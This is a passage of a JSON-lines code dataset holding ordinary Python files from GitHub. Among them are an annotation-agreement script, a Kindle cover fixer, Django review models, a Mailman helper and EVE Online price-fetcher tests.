\"O\", \"G\"))\n for group in groups:\n print(\"Considering labels: \" + str(group))\n by_label = by_lang[\\\n (by_lang['mt_label_x'].isin(group)) & (by_lang['mt_label_y'].isin(group))]\n print(\"Confusion matrix\")\n cm = ConfusionMatrix(by_label['mt_label_x'], by_label['mt_label_y'], \\\n true_name=\"annot_1\", pred_name=\"annot_2\")\n print(cm)\n df = cm.to_dataframe()\n print(\"Normalised confusion matrix\")\n print (df / df.sum().sum())\n kappa, p_o, p_e = get_kappa(cm)\n #print(cm.to_dataframe())\n #print(cm.stats())\n print(\"Kappa: %7.5f; P_o: %7.5f; P_e: %7.5f\" % (kappa, p_o, p_e))\n if args.create_heatmaps and group == (\"A\", \"B\",\"R\", \"O\", \"G\"):\n import matplotlib.pyplot as plt\n import seaborn\n seaborn.set(font_scale=2.2)\n plt.rcParams.update({'figure.autolayout': True})\n heatmap = seaborn.heatmap(df)\n heatmap.set_xlabel(\"Annotator 1\")\n heatmap.set_ylabel(\"Annotator 2\")\n plt.savefig(\"iaa_heatmap_{}.png\".format(lang))\n plt.clf()\n\ndef print_iaa_sentence_detail(agree, detail_file):\n#TODO sentence id, matches per sentence, pc a/b, pc r/o/g. src, tgt, ucca stats\n #sentences = agree[['sent_id', 'lang', 'annot_id_x', 'annot_id_y', 'ucca_label_x', 'mt_label_x', 'mt_label_y']]\n #sentences = sentences.groupby(['sent_id', 'lang'], as_index = False) \n agree['match'] = agree['mt_label_x'] == agree['mt_label_y']\n group = ('A','B')\n agree['ab'] = agree['mt_label_x'].isin(group) & agree['mt_label_y'].isin(group)\n agree['abmatch'] = agree['ab'] & agree['match']\n\n grouped = agree.groupby(['sent_id', 'lang'], as_index=True)\n sentences = pandas.DataFrame({'accuracy' : grouped['match'].sum() / grouped['match'].size()})\n sentences['ab_accuracy'] = grouped['abmatch'].sum() / grouped['ab'].sum()\n\n\n sentences.to_csv(detail_file)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\", \"--node-file\", default=NODES, \\\n help=\"CSV file containing the node data\")\n parser.add_argument(\"--exclude-missing\", default=True, action=\"store_true\",\n help=\"Excluding nodes that either annotator has missed\")\n parser.add_argument(\"--create-heatmaps\", default=False, action=\"store_true\")\n parser.add_argument(\"--separate-label-groups\", default=True, action=\"store_true\",\n help=\"Treat A,B and R,G,O separately\")\n parser.add_argument(\"--iaa-sentence-detail\", help=\"Write detailed IAA for each sentence to the given file\")\n \n\n args = parser.parse_args()\n\n allnodes = pandas.read_csv(args.node_file, converters={'node_id': str, 'parent' : str})\n\n # Generate records of multiply-annotated nodes\n # Join to find nodes annotated by each annotator\n merged = allnodes.merge(allnodes, on = [\"node_id\", \"sent_id\", \"lang\"])\n # Only want records where annotators do not much. Use an ordering\n # so we just get (pl1, pl2) and not (pl2, pl1)\n agree = merged[(merged[\"annot_id_x\"] < merged[\"annot_id_y\"])]\n # Optionally exclude missing annotations. Many of these are when one annotator has missed\n # the node, or the sentences. However some are legitimate, when a leaf node is not required\n # in the target language (such as an article)\n if args.exclude_missing: agree = agree[(agree[\"mt_label_x\"] != \"M\") & (agree[\"mt_label_y\"] != \"M\")]\n\n if args.iaa_sentence_detail:\n print_iaa_sentence_detail(agree, args.iaa_sentence_detail)\n\n for lang, code in LANGCODES:\n by_lang = agree[agree['lang'] == code]\n print (\"************{}*************\".format(lang))\n print_overall_stats(by_lang,args)\n print_overall_iaa(by_lang, code, args)\n print ()\n\n\n\n# alldata = pandas.read_csv(\"data.csv\", converters={'id': str, 'parent' : str})\n# merged = alldata.merge(alldata, on = [\"id\", \"sent\", \"lang\"])\n# agree = merged[(merged[\"user_x\"] < merged[\"user_y\"])]\n#\n# for lang, code in (\"Romanian\",\"ro\"), (\"Polish\", \"pl\"):\n# print (\"CONFUSION MATRIX: \" + lang)\n# by_lang = agree[agree['lang'] == code]\n# \n# #Confusion Matrix\n# #print(\"With Missing\")\n# cm = ConfusionMatrix(by_lang['mteval_x'], by_lang['mteval_y'])\n# print(cm)\n# print(\"Kappa: %7.5f\" % cm.stats()['overall']['Kappa'])\n#\n# #print(\"Without Missing\")\n# #by_lang = by_lang[(by_lang['mteval_x'] != \"M\") & (by_lang['mteval_y'] != \"M\")]\n# #cm = ConfusionMatrix(by_lang['mteval_x'], by_lang['mteval_y'])\n# #print (cm)\n# #print(\"Kappa: %7.5f\" % cm.stats()['overall']['Kappa'])\n#\n# #Break down errors by uccalabel\n# by_lang['match'] = (by_lang['mteval_x'] == by_lang['mteval_y'])\n# by_uccalabel = by_lang.groupby([\"uccalabel_x\", \"match\"])['id'].count().unstack(1).fillna(0)\n# by_uccalabel['pc_correct'] = by_uccalabel[True] / (by_uccalabel[True] + by_uccalabel[False])\n# print(\"Breakdown by uccalabel\")\n# print(by_uccalabel)\n#\n# for label in \"A\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"L\", \"N\", \"None\", \"P\", \"R\", \"S\", \"Ti\":\n# by_uccalabel = by_lang[by_lang['uccalabel_x'] == label]\n# cm = ConfusionMatrix(by_uccalabel['mteval_x'], by_uccalabel['mteval_y'])\n# if cm.len() > 1:\n# try:\n# kappa = \"%7.5f\" % cm.stats()['overall']['Kappa']\n# except:\n# kappa = \"Failed\"\n# print(\"UCCA label: %3s Kappa: %s\" % (label,kappa))\n# # Comment out this to get all CMs\n# if code == \"pl\" and label == \"H\":\n# print(cm)\n#\n#\n# print(\"\")\n#\n \n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"bhaddow/hume-data","sub_path":"round_1/scripts/iaa.py","file_name":"iaa.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"71672681710","text":"import os\r\nimport shutil\r\nsource=input(\"Enter the source name of the Folder: \")\r\ndestination=input(\"Enter the destination name of the Folder: \")\r\n\r\nsource=source + '/'\r\ndestination=destination + '/'\r\n\r\nlistOfFiles=os.listdir(source)\r\nfor file in listOfFiles:\r\n shutil.copy((source+file),destination)\r\n\r\n","repo_name":"Diwakar8-3-8/ProjectC99","sub_path":"backupFiles.py","file_name":"backupFiles.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26885380747","text":"import json\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport japanize_matplotlib \n\n\n\ndef load_json_arr(json_path):\n lines = []\n with open(json_path, 'r') as f:\n for line in f:\n lines.append(json.loads(line))\n return lines\n\n\ndef plot_metrics(working_directory, saved_model_path, label_json, max_iterations, model_type):\n number_of_columns = len(label_json) + 1\n print(\"number_of_columns\", number_of_columns, \"max_iterations\", max_iterations, \"model_type\", model_type)\n experiment_metrics = load_json_arr(os.path.join(working_directory, \"output\", \"metrics.json\"))\n \n x_axis = np.arange(0, max_iterations + 1, max_iterations/5)\n x_axis = x_axis.astype(int)\n\n key_metric = ''\n if (model_type == 'detr' or model_type == 'faster_rcnn' or model_type == 'trident'):\n key_metric = 'bbox/AP'\n elif (model_type == 'mask_rcnn' or model_type == 'pointrend'):\n key_metric = 'segm/AP'\n\n if (key_metric == ''):\n print('model_type', model_type, ' is not supported')\n return\n\n plt.figure(figsize=(10, 7)) \n column_no = 1\n plt.subplot(1,number_of_columns, column_no)\n plt.xticks(x_axis)\n ax = plt.gca()\n ax.set_ylim([0, 100])\n plt.plot(\n [x['iteration'] for x in experiment_metrics if key_metric in x.keys()], \n [x[key_metric] for x in experiment_metrics if key_metric in x.keys()])\n if (number_of_columns > 2):\n plt.title(key_metric + ' Overall') \n else:\n plt.title(key_metric + ' ' + label_json[0]['name']) \n plt.xlabel('iteration')\n\n if (number_of_columns > 2):\n for label in label_json:\n column_no = column_no + 1\n label_id = label['id']\n plt.subplot(1, number_of_columns, column_no)\n plt.xticks(x_axis)\n ax = plt.gca()\n ax.set_ylim([0, 100])\n plt.plot(\n [x['iteration'] for x in experiment_metrics if key_metric in x.keys()], \n [x[key_metric + '-' + str(label_id)] for x in experiment_metrics if key_metric in x.keys()])\n plt.title(key_metric + ' ' + label['name'])\n plt.xlabel('iteration')\n plt.savefig(os.path.join(saved_model_path, 'report.png'))\n\nif __name__ == '__main__':\n working_directory = \"/workspace-test-v1/mlapp/working_directory\"\n saved_model_path = \"/workspace-test-v1/saved-model\"\n max_iteration = 600\n model_type = 'mask_rcnn'\n with open(os.path.join(working_directory, \"labels.json\")) as f:\n labelJson = json.load(f)\n print(\"labelJson\", labelJson)\n plot_metrics(working_directory, saved_model_path, labelJson, max_iteration, model_type)","repo_name":"oita-apc/Chimera-AI-Evangelist","sub_path":"gatewayapp/plotmetrics.py","file_name":"plotmetrics.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34093168429","text":"from django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Sum, Count\nfrom django.utils.translation import ugettext as _\n\nfrom oscar.apps.catalogue.reviews.managers import ApprovedReviewsManager\n\n\nclass AbstractProductReview(models.Model):\n \"\"\"\n Superclass ProductReview.\n\n Some key aspects have been implemented from the original spec.\n * Each product can have reviews attached to it. Each review has a title, a\n body and a score from 0-5.\n * Signed in users can always submit reviews, anonymous users can only\n submit reviews if a setting OSCAR_ALLOW_ANON_REVIEWS is set to true - it\n should default to false.\n * If anon users can submit reviews, then we require their name, email\n address and an (optional) URL.\n * By default, reviews must be approved before they are live.\n However, if a setting OSCAR_MODERATE_REVIEWS is set to false,\n then they don't need moderation.\n * Each review should have a permalink, ie it has its own page.\n * Each reviews can be voted up or down by other users\n * Only signed in users can vote\n * A user can only vote once on each product once\n \"\"\"\n\n # Note we keep the review even if the product is deleted\n product = models.ForeignKey(\n 'catalogue.Product', related_name='reviews', null=True,\n on_delete=models.SET_NULL)\n\n # Scores are between 0 and 5\n SCORE_CHOICES = tuple([(x, x) for x in range(0, 6)])\n score = models.SmallIntegerField(_(\"Score\"), choices=SCORE_CHOICES)\n\n title = models.CharField(max_length=255, verbose_name=_(\"Review title\"))\n body = models.TextField(_(\"Body\"))\n\n # User information. We include fields to handle anonymous users\n user = models.ForeignKey(\n 'auth.User', related_name='reviews', null=True, blank=True)\n name = models.CharField(_(\"Name\"), max_length=255, null=True, blank=True)\n email = models.EmailField(_(\"Email\"), null=True, blank=True)\n homepage = models.URLField(_(\"URL\"), null=True, blank=True)\n\n FOR_MODERATION, APPROVED, REJECTED = range(0, 3)\n STATUS_CHOICES = (\n (FOR_MODERATION, _(\"Requires moderation\")),\n (APPROVED, _(\"Approved\")),\n (REJECTED, _(\"Rejected\")),\n )\n default_status = FOR_MODERATION if settings.OSCAR_MODERATE_REVIEWS else APPROVED\n status = models.SmallIntegerField(\n _(\"Status\"), choices=STATUS_CHOICES, default=default_status)\n\n # Denormalised vote totals\n total_votes = models.IntegerField(\n _(\"Total Votes\"), default=0) # upvotes + down votes\n delta_votes = models.IntegerField(\n _(\"Delta Votes\"), default=0, db_index=True) # upvotes - down votes\n\n date_created = models.DateTimeField(auto_now_add=True)\n\n # Managers\n objects = models.Manager()\n approved = ApprovedReviewsManager()\n\n class Meta:\n abstract = True\n ordering = ['-delta_votes']\n unique_together = (('product', 'user'),)\n verbose_name = _('Product Review')\n verbose_name_plural = _('Product Reviews')\n\n @models.permalink\n def get_absolute_url(self):\n return ('catalogue:reviews-detail', (), {\n 'product_slug': self.product.slug,\n 'product_pk': self.product.id,\n 'pk': self.id})\n\n def __unicode__(self):\n return self.title\n\n def save(self, *args, **kwargs):\n if not self.user and not (self.name and self.email):\n raise ValidationError(_(\"Anonymous review must have a name and an email\"))\n if not self.title:\n raise ValidationError(_(\"Reviews must have a title\"))\n if self.score is None:\n raise ValidationError(_(\"Reviews must have a score\"))\n super(AbstractProductReview, self).save(*args, **kwargs)\n self.product.update_rating()\n\n def delete(self, *args, **kwargs):\n super(AbstractProductReview, self).delete(*args, **kwargs)\n self.product.update_rating()\n\n def has_votes(self):\n return self.total_votes > 0\n\n def num_up_votes(self):\n \"\"\"Returns the total up votes\"\"\"\n return int((self.total_votes + self.delta_votes) / 2)\n\n def num_down_votes(self):\n \"\"\"Returns the total down votes\"\"\"\n return int((self.total_votes - self.delta_votes) / 2)\n\n def update_totals(self):\n \"\"\"\n Update total and delta votes\n \"\"\"\n result = self.votes.aggregate(\n score=Sum('delta'), total_votes=Count('id'))\n self.total_votes = result['total_votes'] or 0\n self.delta_votes = result['score'] or 0\n self.save()\n\n def get_reviewer_name(self):\n if self.user:\n name = self.user.get_full_name()\n return name if name else _('anonymous')\n else:\n return self.name\n\n\nclass AbstractVote(models.Model):\n \"\"\"\n Records user ratings as yes/no vote.\n * Only signed-in users can vote.\n * Each user can vote only once.\n \"\"\"\n review = models.ForeignKey('reviews.ProductReview', related_name='votes')\n user = models.ForeignKey('auth.User', related_name='review_votes')\n UP, DOWN = 1, -1\n VOTE_CHOICES = (\n (UP, _(\"Up\")),\n (DOWN, _(\"Down\"))\n )\n delta = models.SmallIntegerField(_('Delta'), choices=VOTE_CHOICES)\n date_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n abstract = True\n ordering = ['-date_created']\n unique_together = (('user', 'review'),)\n verbose_name = _('Vote')\n verbose_name_plural = _('Votes')\n\n def __unicode__(self):\n return u\"%s vote for %s\" % (self.delta, self.review)\n\n def save(self, *args, **kwargs):\n super(AbstractVote, self).save(*args, **kwargs)\n self.review.update_totals()\n","repo_name":"riklaunim/django-oscar-custom-multisite","sub_path":"oscar/apps/catalogue/reviews/abstract_models.py","file_name":"abstract_models.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19686846595","text":"#!/usr/bin/python3\ndef safe_print_division(a, b):\n \"\"\"Function divides two integers and prints the result.\"\"\"\n try:\n x = int(a) / int(b)\n except Exception:\n x = None\n finally:\n if x is not None:\n print(\"Inside result: {}\".format(x))\n return x\n else:\n return None\n","repo_name":"aloicerains/alx-higher_level_programming","sub_path":"0x05-python-exceptions/3-safe_print_division.py","file_name":"3-safe_print_division.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31691783906","text":"from Mailman import mm_cfg\nfrom Mailman import Utils\nfrom Mailman import MailList\n\ndef get_list_attributes_for_overview(script_url_part):\n # Skip any mailing lists that isn't advertised.\n hostname = Utils.get_domain()\n advertised = []\n listnames = Utils.list_names()\n listnames.sort()\n\n for name in listnames:\n mlist = MailList.MailList(name, lock=0)\n if mlist.advertised or mm_cfg.OverviewListUnadvertizedMailingLists:\n if mm_cfg.VIRTUAL_HOST_OVERVIEW and (\n mlist.web_page_url.find('/%s/' % hostname) == -1 and\n mlist.web_page_url.find('/%s:' % hostname) == -1):\n # List is for different identity of this host - skip it.\n continue\n else:\n if mm_cfg.LISTINFO_USE_CATEGORIES:\n data = mlist\n else:\n data = (mlist.GetScriptURL(script_url_part),\n mlist.real_name,\n mlist.description)\n advertised.append(data)\n return advertised\n","repo_name":"darix/mailman","sub_path":"Mailman/CgiUtils.py","file_name":"CgiUtils.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15994805393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport glob\nimport imghdr\nimport string\nimport tempfile\nfrom pathlib import Path\n\nfrom File import MOBIFile\n\n\nclass FixCover:\n version = '1.1'\n description = 'A tool to fix damaged Kindle ebook covers.\\n\\\nDetail: https://bookfere.com/post/986.html'\n\n\n def __init__(self, logger=None, progress=None):\n self.logger = logger\n self.progress = progress\n\n self.print_log('Version: %s' % self.version)\n self.print_log(self.description, True)\n\n\n def print_log(self, text, sep=False):\n if self.logger is not None:\n divider = '-------------------------------------------'\n text = '%s\\n%s\\n%s' % (divider, text, divider) \\\n if sep is True else text\n self.logger(text)\n\n\n def print_progress(self, factor):\n if self.progress is not None:\n self.progress(factor)\n\n\n def get_filepath_list(self, path):\n return glob.glob('%s%s**' % (path, os.sep), recursive=True)\n\n\n def get_ebook_thumbnails(self, path):\n thumbnails = dict()\n for thumbnail in self.get_filepath_list(path):\n asin = re.match(rf'.*{re.escape(os.sep)}thumbnail_(.+)_EBOK.+',\n thumbnail)\n if asin is not None:\n thumbnails[asin.group(1)] = thumbnail\n return thumbnails\n\n\n def get_damaged_thumbnails(self, path):\n thumbnails = self.get_ebook_thumbnails(path)\n for thumbnail in thumbnails.copy():\n thumbnail_path = thumbnails[thumbnail]\n if os.path.getsize(thumbnail_path) < 2000:\n self.print_log('- %s' % Path(thumbnail_path).name)\n else:\n del thumbnails[thumbnail]\n return thumbnails\n\n\n def is_valid_ebook_file(self, filename):\n for ext in ['.mobi', '.azw', '.azw3', 'azw4']:\n if filename.endswith(ext):\n return True\n return False\n\n\n def get_ebook_list(self, path):\n ebook_list = []\n for filename in self.get_filepath_list(path):\n if not self.is_valid_ebook_file(filename):\n continue\n ebook_list.append(filename)\n return ebook_list\n\n\n def store_ebook_cover(self, path, data):\n with open(path, 'wb') as file:\n file.write(data)\n\n\n def get_ebook_metadata(self, path):\n ebook_asin = None\n ebook_type = None\n ebook_cover = None\n\n try:\n mobi_file = MOBIFile(path)\n ebook_asin = mobi_file.get_metadata('ASIN')\n ebook_type = mobi_file.get_metadata('Document Type')\n ebook_cover = mobi_file.get_cover_image()\n except:\n pass\n\n return (ebook_asin, ebook_type, ebook_cover)\n\n\n def get_thumbnail_name(self, asin):\n return 'thumbnail_%s_EBOK_portrait.jpg' % asin\n\n\n def fix_ebook_thumbnails(self, documents_path, thumbnails_path):\n failure_jobs = {\n 'cover_errors': [],\n 'ebook_errors': [],\n }\n\n self.print_log('Checking damaged ebook covers:', True)\n thumbnails = self.get_damaged_thumbnails(thumbnails_path)\n\n if len(thumbnails) < 1:\n self.print_log('No damaged ebook cover detected.')\n return\n\n self.print_log('Fixing damaged ebook covers:', True)\n self.print_log('Working...')\n\n ebook_list = self.get_ebook_list(documents_path)\n for ebook in ebook_list:\n self.print_progress(len(ebook_list))\n\n ebook_asin, ebook_type, ebook_cover = self.get_ebook_metadata(ebook)\n\n ebook = Path(ebook)\n\n if ebook_type == 'EBOK' and ebook_asin in thumbnails.keys():\n thumbnail_path = thumbnails[ebook_asin]\n thumbnail_name = Path(thumbnail_path).name\n if ebook_cover is not None:\n self.store_ebook_cover(thumbnail_path, ebook_cover)\n self.print_log('✓ Fixed: %s\\n └─[%s] %s' % (thumbnail_name,\n ebook_type, ebook.name))\n else:\n failure_jobs['ebook_errors'].append('%s\\n └─[%s] %s' %\n (ebook_type, thumbnail_name, ebook.name))\n del thumbnails[ebook_asin]\n elif ebook_type == 'EBOK' and ebook_cover is not None:\n thumbnail_name = self.get_thumbnail_name(ebook_asin)\n thumbnail_path = os.path.join(thumbnails_path, thumbnail_name)\n if not os.path.exists(thumbnail_path):\n self.store_ebook_cover(thumbnail_path, ebook_cover)\n self.print_log('✓ Generated: %s\\n └─[%s] %s' %\n (thumbnail_name, ebook_type, ebook.name))\n # [BUG] Do this will make Kindle can not open ebook.\n # elif ebook_type == 'PDOC' and ebook.suffix == '.azw3' and \\\n # ebook_cover is not None:\n # target = ebook.with_suffix('.mobi')\n # ebook.rename(target)\n # self.print_log(\n # '✓ Rename %s -> %s to show cover.\\n └─[%s] %s' %\n # (ebook.suffix, target.suffix, ebook_type, target.name)\n # )\n\n\n failure_jobs['cover_errors'] = [Path(thumbnail).name for\n thumbnail in thumbnails.values()]\n\n self.print_progress(0)\n\n if failure_jobs is None:\n self.print_log('- No ebook cover to fix.')\n return\n\n if any(len(job) > 0 for job in failure_jobs.values()):\n if len(failure_jobs['cover_errors']) > 0:\n self.print_log(\n '- These damaged covers have no corresponding ebook.'\n )\n for job in failure_jobs['cover_errors']:\n self.print_log('* %s' % job)\n\n\n if len(failure_jobs['ebook_errors']) > 0:\n self.print_log(\n '- The ebooks corresponding to these damaged covers have no'\n + ' covers, you can clean them.'\n )\n for job in failure_jobs['ebook_errors']:\n self.print_log('! %s' % job)\n else:\n self.print_log('✓ All ebook covers were fixed.')\n\n\n def clean_orphan_thumbnails(self, documents_path, thumbnails_path):\n self.print_log('Analysing orphan ebook covers:', True)\n thumbnails = self.get_ebook_thumbnails(thumbnails_path)\n ebook_list = self.get_ebook_list(documents_path)\n for ebook in ebook_list:\n self.print_progress(len(ebook_list))\n ebook_asin, ebook_type, ebook_cover = self.get_ebook_metadata(ebook)\n if ebook_type == 'EBOK' and ebook_asin in thumbnails.keys():\n del thumbnails[ebook_asin]\n\n self.print_progress(0)\n\n if len(thumbnails) < 1:\n self.print_log('- No orphan covers detected.')\n return\n\n for thumbnail in thumbnails.values():\n thumbnail_path = Path(thumbnail)\n thumbnail_path.unlink(True)\n self.print_log('✓ Delete: %s' % thumbnail_path.name)\n\n self.print_log('✓ All orphan ebook covers deleted.')\n\n\n def get_kindle_path(self, path):\n return (\n os.path.join(path, 'documents'),\n os.path.join(path, 'system', 'thumbnails')\n )\n\n\n def is_kindle_root(self, path):\n for path in self.get_kindle_path(path):\n if os.path.exists(path) is False:\n return False\n return True\n\n\n def get_kindle_root_manually(self, args):\n roots = []\n for path in args:\n path = os.path.join(path)\n if self.is_kindle_root(path):\n roots.append(path)\n else:\n message = '%s is not a kindle root directory.' % path if \\\n path != '' else 'You need choose a Kindle root directory first.'\n self.print_log(message)\n return roots\n\n\n def get_kindle_root_automatically(self):\n drives = []\n roots = []\n\n if sys.platform.startswith('win'):\n drives = ['%s:\\\\' % s.upper() for s in string.ascii_lowercase[:26]]\n drives.reverse()\n elif sys.platform.startswith('darwin'):\n drives = glob.glob('/Volumes/*')\n\n for drive in drives:\n path = os.path.join('%s' % drive)\n if self.is_kindle_root(path):\n roots.append(path)\n\n return roots\n\n\n def get_kindle_root(self, roots):\n if len(roots) > 0:\n return self.get_kindle_root_manually(roots)\n return self.get_kindle_root_automatically()\n\n\n # fix|clean\n def handle(self, action='fix', path=[]):\n if not sys.version_info >= (3, 5):\n self.print_log(\n 'Rquired Python version >= 3.5\\n' +\n 'You can download here: https://www.python.org/downloads/'\n )\n return\n\n path = [path] if type(path) != list else path\n kindle_roots = self.get_kindle_root(path)\n\n for kindle_root in kindle_roots:\n self.print_log('Processing Kindle device: %s' % kindle_root)\n\n documents_path, thumbnails_path = self.get_kindle_path(kindle_root)\n\n if action == 'fix':\n self.fix_ebook_thumbnails(documents_path, thumbnails_path)\n elif action == 'clean':\n self.clean_orphan_thumbnails(documents_path, thumbnails_path)\n else:\n self.print_log('Wrong action.')\n return\n\n self.print_log('All jobs done.', True)\n","repo_name":"muyutingfeng/Fix-Kindle-Ebook-Cover","sub_path":"FixCover.py","file_name":"FixCover.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"14905425488","text":"\"\"\"extend app name length\n\nRevision ID: dfef3701086d\nRevises: 28610f9f9afc\nCreate Date: 2017-06-24 19:20:13.713135\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'dfef3701086d'\ndown_revision = '28610f9f9afc'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n op.alter_column('trade_keep_alive', 'app_name',\n existing_type=mysql.VARCHAR(length=20),\n type_=sa.String(length=255),\n existing_nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('trade_keep_alive', 'app_name',\n existing_type=sa.String(length=255),\n type_=mysql.VARCHAR(length=20),\n existing_nullable=True)\n ### end Alembic commands ###\n","repo_name":"zhangyiant/gtja_trade","sub_path":"alembic/versions/dfef3701086d_extend_app_name_length.py","file_name":"dfef3701086d_extend_app_name_length.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"71628444270","text":"import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv('tmp_pglog_all.csv',sep='\\t',header=0)\ndata.columns = ['tip','pid','time','cpu','memory']\n\ndata['time'] = data['time']-data['time'].min()\ndata['time'] = data['time'] / 60\ndata['time'] = data['time'].astype(int)\ndata = data.groupby(['time','pid'])[['cpu','memory']].max().reset_index()\ndata.to_csv('report_pglog_all.csv',sep='\\t',header=True)\n\ndata = data.groupby('time')[['cpu','memory']].sum().reset_index()\nprint(f'CPU max: {data[\"cpu\"].max()}',flush=True) \nprint(f'MEM max: {data[\"memory\"].max()}',flush=True) \ndata.to_csv('report_pglog_all_as_one.csv',sep='\\t',header=True)\n","repo_name":"BGI-Qingdao/ProcessGroupMonitor","sub_path":"merge_all_thread.py","file_name":"merge_all_thread.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"38"} +{"seq_id":"71533741230","text":"#Clay Kynor\n#11/15/17\n#displayDate.py\n\nimport datetime\n\nmonths = ['January', 'February', \"March\", 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']\nweekday = ['Monday', 'Tuesday', 'Wensday', 'Thursday', 'Firday', 'Saturday', 'Sunday']\ntoday = datetime.date.today()\nday = today.day\nmonth = today.month\nyear = today.year\n\nprint(month, day, year)\n","repo_name":"Clay190/Unit-5","sub_path":"displayDate.py","file_name":"displayDate.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"175101069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nfrom django.test import TestCase\n\nimport mock\nfrom model_mommy import mommy\n\nfrom eve.models import SolarSystem\nfrom eve.models import Station\nfrom eve.utils import PriceFetcher\nfrom eve.utils import get_station_or_system\n\n\nclass TestEveUtils(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.item_1 = mommy.make('Item')\n cls.item_2 = mommy.make('Item')\n cls.region = mommy.make('Region')\n cls.station = mommy.make('Station')\n cls.solar_system = mommy.make('SolarSystem')\n\n cls.type_ids = [cls.item_1.type_id, cls.item_2.type_id]\n cls.region_id = cls.region.region_id\n\n cls.test_price_data = {\n 'sell': {\n 'min': 10.74,\n 'max': 17.4,\n 'median': 12.23,\n 'volume': 6780164119,\n 'percentile': 10.88,\n 'stddev': 1.67,\n 'avg': 13.15\n },\n 'all': {\n 'min': 1.01,\n 'max': 17.4,\n 'median': 11.32,\n 'volume': 9534000331,\n 'percentile': 6.93,\n 'stddev': 2.22,\n 'avg': 12.19\n },\n 'buy': {\n 'min': 5.0,\n 'max': 10.69,\n 'median': 10.55,\n 'volume': 2742836212,\n 'percentile': 10.68,\n 'stddev': 1.31,\n 'avg': 9.88\n },\n 'id': cls.item_1.type_id\n }\n\n cls.market_stats_raw_return_data = {\n cls.item_1.type_id: {\n 'sell': {\n 'min': 10.74,\n 'max': 17.4,\n 'median': 12.23,\n 'volume': 6780164119,\n 'percentile': 10.88,\n 'stddev': 1.67,\n 'avg': 13.15\n },\n 'all': {\n 'min': 1.01,\n 'max': 17.4,\n 'median': 11.32,\n 'volume': 9534000331,\n 'percentile': 6.93,\n 'stddev': 2.22,\n 'avg': 12.19\n },\n 'buy': {\n 'min': 5.0,\n 'max': 10.69,\n 'median': 10.55,\n 'volume': 2742836212,\n 'percentile': 10.68,\n 'stddev': 1.31,\n 'avg': 9.88\n },\n 'id': cls.item_1.type_id\n }\n }\n\n def test_get_station_or_system(self):\n station_id = self.station.station_id\n\n location_name, location_obj = get_station_or_system(station_id)\n self.assertEqual(location_name, 'station')\n\n solar_system_id = self.solar_system.solar_system_id\n\n location_name, location_obj = get_station_or_system(solar_system_id)\n self.assertEqual(location_name, 'solar_system')\n\n @mock.patch('evelink.thirdparty.eve_central.EVECentral.market_stats')\n def test_eve_central_manager_returns_price_data_dict_using_system(self, mock_market_stats):\n mock_market_stats.return_value = self.market_stats_raw_return_data\n\n type_ids = [self.item_1.type_id]\n system = self.solar_system.solar_system_id\n\n manager = PriceFetcher(type_ids, system=system)\n price_data = manager.fetch().next()\n\n self.assertEqual(price_data, self.test_price_data)\n\n @mock.patch('evelink.thirdparty.eve_central.EVECentral.market_stats')\n def test_eve_central_manager_returns_price_data_dict_using_hours(self, mock_market_stats):\n mock_market_stats.return_value = self.market_stats_raw_return_data\n\n type_ids = [self.item_1.type_id]\n system = self.solar_system.solar_system_id\n hours = 5\n\n manager = PriceFetcher(type_ids, hours=hours, system=system)\n price_data = manager.fetch().next()\n\n self.assertEqual(price_data, self.test_price_data)\n\n @mock.patch('evelink.thirdparty.eve_central.EVECentral.market_stats')\n def test_eve_central_manager_returns_price_data_dict_using_regions(self, mock_market_stats):\n mock_market_stats.return_value = self.market_stats_raw_return_data\n\n type_ids = [self.item_1.type_id]\n regions = self.region.region_id\n\n manager = PriceFetcher(type_ids, regions=regions)\n price_data = manager.fetch().next()\n\n self.assertEqual(price_data, self.test_price_data)\n\n def test_eve_central_manager_raises_exception(self):\n type_ids = [self.item_1.type_id]\n\n with self.assertRaises(AttributeError):\n PriceFetcher(type_ids)\n","repo_name":"Nicksil/inventory-management","sub_path":"inventory_manager/eve/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} 